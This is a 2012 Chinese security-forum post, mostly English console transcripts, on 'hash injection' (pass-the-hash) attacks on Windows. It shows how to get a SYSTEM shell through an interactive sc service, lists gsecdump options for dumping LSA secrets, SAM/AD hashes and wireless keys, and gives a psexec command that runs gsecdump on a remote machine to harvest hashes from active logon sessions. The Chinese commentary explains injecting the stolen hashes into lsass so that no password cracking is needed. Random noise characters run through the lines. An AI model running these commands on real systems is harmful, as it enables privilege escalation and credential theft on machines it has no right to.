找回密码
 立即注册
查看: 2549|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:& @1 a: C4 _% t
: k  ]3 |/ @: B; P" o
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
4 Z/ g% Y9 D9 y* ^0 ~& c' k* V[SC] CreateService SUCCESS
( c' R/ C- P, {8 W7 t: Q% ^- z6 M6 b* o8 _4 h3 Q5 k( w6 ^
C:\>sc start shellcmdline! W- W! d% u" d7 Z+ y5 d9 g! ]9 _7 t
[SC] StartService FAILED 1053:
0 p+ [+ c' D$ q& K
5 N5 Z+ W  R# ]5 U3 Y6 G' f+ dThe service did not respond to the start or control request in a timely fashion.: @7 e  |4 k# R5 c( \

. _! B0 v2 g/ M3 aC:\>sc delete shellcmdline
) Q! x9 g2 r( I0 d0 E[SC] DeleteService SUCCESS1 I' h! [& W0 v- Q. h

* V4 o4 G; x" W0 `  \------------; B8 c" j3 U6 d2 I- J& J
8 j0 e' g0 U9 b2 m) y( ~
Then in the new DOS window:; j: }$ A3 n! H; g# P

1 o0 Y3 p5 Q+ Y- h2 NMicrosoft Windows XP [Version 5.1.2600]
8 u* V0 N, M& g3 {3 B: R(C) Copyright 1985-2001 Microsoft Corp.
* S8 Y8 x* z2 m' ?& q
2 s. N; K/ t8 fC:\WINDOWS\system32>whoami8 {# I1 N4 D+ B* z
NT AUTHORITY\SYSTEM
1 p6 p' s' ]0 u# b9 ]* n& m4 @
- X! O; `% x* N7 T, Q: S& XC:\WINDOWS\system32>gsecdump -h
4 O7 `/ Z1 J; a7 C1 Dgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
, `) W1 L9 B4 B+ f& [# musage: gsecdump [options]1 O; P3 d- T' R( S6 d  @
5 [- V' c0 f5 ?
options:5 P$ p, X; z' ]- I7 C% M, s) T
-h [ --help ] show help9 W4 L* e& S* i" ]& W4 |7 \0 t3 Z( \1 e
-a [ --dump_all ] dump all secrets3 ^1 Z; I' b* X$ F) E1 }  v
-l [ --dump_lsa ] dump lsa secrets& b( V$ ], ]2 B
-w [ --dump_wireless ] dump microsoft wireless connections
$ y% }, ]1 O. H4 l-u [ --dump_usedhashes ] dump hashes from active logon sessions6 H# F" z- ~4 n' q
-s [ --dump_hashes ] dump hashes from SAM/AD" x0 T' M$ T- L8 K" k$ e8 n- v
. E5 @! x4 u; ~* |) B! N" ]
Although I like to use:& @& j! z: ~; v
$ {2 O6 j7 L( G0 G* a
PsExec v1.83 - Execute processes remotely
7 g- ^& m, j) O+ c2 F; M. qCopyright (C) 2001-2007 Mark Russinovich
. [5 B/ o3 S! USysinternals - 链接标记[url]www.sysinternals.com[/url]
$ Z/ R: v* N3 Y; X0 D3 K) `$ j" P" [/ }8 n
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
2 j. [- }+ h, }" l( n' M
2 K1 D0 X. D' N5 d/ Xto get the hashes from active logon sessions of a remote system.1 X1 T$ G0 f+ n4 @; O( _
  @1 J5 I# }' |$ Y" S
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.$ T8 r* x$ r! x
/ ?% d& u# z2 {# q1 I
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
8 t1 [9 r& @4 R4 o/ t0 s# G9 y原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
& Z) \- ], j* ]) d2 y. ~9 E  @9 M
5 U( V; [1 b3 r我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。5 _, Y# F9 x- {9 Q. Y+ X$ x4 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表